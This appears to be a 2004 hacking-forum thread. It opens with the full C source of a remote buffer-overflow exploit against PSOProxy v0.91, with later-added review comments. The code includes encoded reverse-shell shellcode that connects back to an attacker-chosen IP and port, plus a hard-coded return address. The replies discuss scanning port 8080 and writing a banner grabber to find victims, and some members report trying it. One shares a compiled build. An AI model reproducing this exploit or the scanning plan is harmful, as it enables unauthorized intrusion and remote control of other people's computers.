Feuerstein
Feb 22 2004, 02:21 PM
from
Corumputer Anyone ideas for scanning this ?
CODE
/******************************************************************/
/*     [Crpt] PSOProxy v0.91 remote sploit by kralor [Crpt]       */
/******************************************************************/
/* (filtered) eEye                                                */
/* (filtered) private exploits                                    */
/* in other words, (filtered) you all security money makers and   */
/* private exploits exchangers.                                   */
/* lolo xXx thanks for errr.. she knows why =)                    */
/* 30min debugging/coding "hobbie"..no universal 'jmp esp' addr.. */
/******************************************************************/
/* informations: www.coromputer.net, irc undernet #coromputer     */
/******************************************************************/
/*
 * Review notes (analysis / defender view of this 2004 proof-of-concept;
 * only comments were added, the code is unchanged):
 *
 *  - What the code visibly does: one TCP connection to the target on
 *    port 8080, then a single SIZE (1935) byte buffer that is all 0x90
 *    except a 4-byte overwrite at offset RET_POS (1024) and the encoded
 *    payload copied in at offset 1132, followed by "\r\n", then close.
 *    On the wire that is a ~1.9 KB "request line" with no HTTP method,
 *    dominated by 0x90 bytes and terminated by CRLF -- that is the
 *    observable a detection rule or proxy log review would key on.
 *  - The overwrite value is one hard-coded address the author ties to
 *    "win2k pro fr sp3"; nothing in the listing adapts it to other builds
 *    (the header itself says there is no universal address).
 *  - The payload carries a decoder the author labels a "classic xorer";
 *    main() XOR-masks the connect-back IP and port with 0x95959595 before
 *    patching them into the payload, presumably so they decode back to
 *    the real values at run time (not verified here).
 */
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")   /* MSVC-specific: pulls in ws2_32.lib */

#define PORT     8080        /* target service port */
#define RET_POS  1024        /* offset in useme[] where the 4-byte return address is written */
#define SIZE     1935        /* bytes sent before the trailing "\r\n" */
#define RET_ADDR 0x77E729E3  /* win2k pro fr sp3 -- single hard-coded, build-specific value */
/* Marker bytes: a run of four of these inside shellc0de[] is where main()
 * patches the (XOR-masked) connect-back address / port, see the loop there. */
#define HOP 0xd4  /* host opcode */
#define POP 0xd7  /* port opcode */

/*
 * Open a TCP connection to host:port.
 *
 * host: hostname or dotted-quad; gethostbyname() is tried first, then
 *       inet_addr() as a literal address.
 * port: TCP port in host byte order.
 * Returns the connected socket, or 0 after printing a message on any
 * failure (callers test `if(!sock)`).
 *
 * NOTE(review): Winsock's socket() reports failure as INVALID_SOCKET, not
 * 0, so the `if(!sock)` test right after it does not catch that case.
 * `yeah` is also never zeroed before use.
 */
int cnx(char *host, int port)
{
    int sock;
    struct sockaddr_in yeah;
    struct hostent *she;

    sock=socket(AF_INET,SOCK_STREAM,0);
    if(!sock) {
        printf("error: unable to create socket\r\n");
        return 0;
    }
    yeah.sin_family=AF_INET;
    yeah.sin_addr.s_addr=inet_addr(host);   /* overwritten below on either branch */
    yeah.sin_port=htons((u_short)port);
    if((she=gethostbyname(host))!=NULL) {
        /* name resolved: copy the first address record */
        memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
    } else {
        /* not a resolvable name: accept a literal dotted-quad only */
        if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
            printf("error: cannot resolve host\r\n");
            return 0;
        }
    }
    printf("[+] Connecting to %-30s ...",host);
    if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
        /* any connect() failure is reported as "refused" */
        printf("error: connection refused\r\n");
        return 0;
    }
    printf("Done\r\n");
    return sock;
}

/* Print usage and exit(0).  prog is argv[0]. Never returns. */
void syntax(char *prog)
{
    printf("syntax: %s <host> <your_ip> <your_port>\r\n",prog);
    exit(0);
}

/* Print the author's banner. */
void banner(void)
{
    printf("\r\n\t [Crpt] PSOProxy v0.91 remote sploit by kralor [Crpt]\r\n");
    printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
    return;
}

/*
 * Entry point: argv[1] = target host, argv[2] = connect-back IP,
 * argv[3] = connect-back port.  Returns 0 on success, -1 on any error
 * (messages printed to stdout).
 */
int main(int argc, char *argv[])
{
    WSADATA wsaData;
    int sock;
    char useme[SIZE];              /* the buffer sent to the target */
    unsigned long host,port;       /* XOR-masked sockaddr fields patched into the payload */
    unsigned int i;
    char shellc0de[] = /* sizeof(shellc0de+xorer) == 333 bytes */
    /* classic xorer */
    "\x90" // 0xcc (breakpoint) for debug :P
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
    "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
    /* shellc0de */
    "\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
    "\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
    "\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
    "\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
    "\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
    "\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
    /* the two 4-byte HOP / POP runs below are the slots patched in the loop */
    "\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
    "\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
    "\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
    "\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
    "\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
    "\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
    "\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
    "\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
    "\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
    "\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
    "\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
    "\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
    "\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
    "\x57\x91\x95";

    banner();
    if(argc!=4) syntax(argv[0]);

    /* connect-back IP, masked with the same key the decoder stub uses */
    host=inet_addr(argv[2])^0x95959595;
    port=atoi(argv[3]);
    /* port is unsigned long: a negative atoi() result wraps and is caught by the >65535 test */
    if(port<=0||port>65535) {
        printf("error: <port> must be between 1 and 65535\r\n");
        return -1;
    }
    /* Appears to build the {sin_family=2, sin_port} pair as one 32-bit
     * little-endian word, then mask it like `host` -- not verified. */
    port=htons((unsigned short)port);
    port=port<<16;
    port+=0x0002;
    port=port^0x95959595;

    /* Locate the four-byte HOP and POP marker runs in the payload and
     * overwrite them; host/port are zeroed once patched so the check
     * after the loop can tell whether both slots were found.
     * NOTE(review): i runs to sizeof(shellc0de)-1 but shellc0de[i+3] is
     * read unconditionally, so the last iterations read past the array. */
    for(i=0;i<sizeof(shellc0de);i++) {
        if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
            if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
                memcpy(&shellc0de[i],&host,4);
                host=0;
            }
        if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
            if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
                memcpy(&shellc0de[i],&port,4);
                port=0;
            }
    }
    if(host||port) {
        printf("error: unabled to find ip/port sequence in shellc0de\r\n");
        return -1;
    }

    if(WSAStartup(0x0101,&wsaData)!=0) {   /* Winsock 1.1 */
        printf("error: unable to load winsock\r\n");
        return -1;
    }
    sock=cnx(argv[1],PORT);
    if(!sock) return -1;

    /* Buffer layout (what the target / a sensor sees):
     *   [0 .. SIZE)      0x90 filler
     *   [1024 .. 1028)   RET_ADDR (little-endian) via the cast below
     *   [1132 .. 1132+sizeof(shellc0de)-1)   decoder stub + payload, no NUL
     * then "\r\n" as a second send().
     * NOTE(review): the unsigned long* cast into a char array is an
     * unaligned, aliasing-violating store; it works on the x86/MSVC
     * toolchain this was written for, not portably. */
    memset(useme,0x90,SIZE);
    memcpy(&useme[1132],shellc0de,sizeof(shellc0de)-1);
    *(unsigned long*)&useme[RET_POS] = RET_ADDR; // eip pointing to jmp esp...
    printf("[+] Sending magic string ...");
    send(sock,useme,sizeof(useme),0);   /* return values of both send() calls are ignored */
    send(sock,"\r\n",2,0);
    closesocket(sock);
    printf("Done\r\n");
    return 0;
}
dragonfly
Feb 22 2004, 02:38 PM
#define PORT 8080
hope this works
Reclone
Feb 22 2004, 02:38 PM
When looking at the code it says port 8080.
That will give you a lot of useless results, so maybe use a banner grabber
dragonfly
Feb 22 2004, 02:39 PM
me was first reclone hehehe but indeed try a banner grabber
Feuerstein
Feb 22 2004, 02:40 PM
y0 that was my intention
im in the need of the banner, this proxy gives us. im sure im able to write us a scanner then
s54
Feb 22 2004, 04:02 PM
Good luck finding and hacking computers with that one running
Feuerstein
Feb 22 2004, 04:33 PM
QUOTE (s54 @ Feb 22 2004, 06:02 PM) Good luck finding and hacking computers with that one running
hehe, i think they are more rare than the imail ones
TheOther
Feb 22 2004, 04:34 PM
Feuerstein, I'll install the proxy to see what the banner is. You write the banner checker?
TheOther
Feb 22 2004, 04:38 PM
Don't think that this exploit is useful: PSOProxy is a program that lets you transfer your Phantasy Star Online snapshot files from your Gamecube to your PC as PNG picture files. The latest version of PSOProxy is version 0.91.
dragonfly
Feb 22 2004, 05:12 PM
hm so not many ppl has it
2 bad =)
Feuerstein
Feb 22 2004, 05:49 PM
QUOTE (dragonfly @ Feb 22 2004, 07:12 PM) hm so not many ppl has it 2 bad =)
thats the point, but: y0, TheOther, i will, but for win only
Alien
Feb 22 2004, 06:46 PM
compiled this with any errors
here is compiled ver.
Siliconized
Feb 22 2004, 07:27 PM
Indeed, even if this xploit weren't rare: if u scan for port 8080 u'll find many results, and very few of them might be this.
So even with a banner checker it will take some time, and i'm not sure about the results
But anyway yet another one from kralor
Major Chrome
Feb 23 2004, 05:15 AM
I'm gonna give this a go and see what I find, most likely going to be useless things, but nice to know all the less.
Sedolf
Feb 23 2004, 06:16 AM
Lol then go find some french people with a gamecube and win2k
Leonnetje
Feb 23 2004, 01:32 PM
QUOTE (Major Chrome @ Feb 23 2004, 05:15 AM) I'm gonna give this a go and see what I find, most likely going to be useless things, but nice to know all the less.
Good luck....
I've tried some scanning on it, but it's far from vulnerable
Major Chrome
Feb 23 2004, 09:23 PM
I've found nothing either, oh well, was worth a go.
DvilleStoner
Feb 26 2004, 09:28 AM
any scanner for this out yet?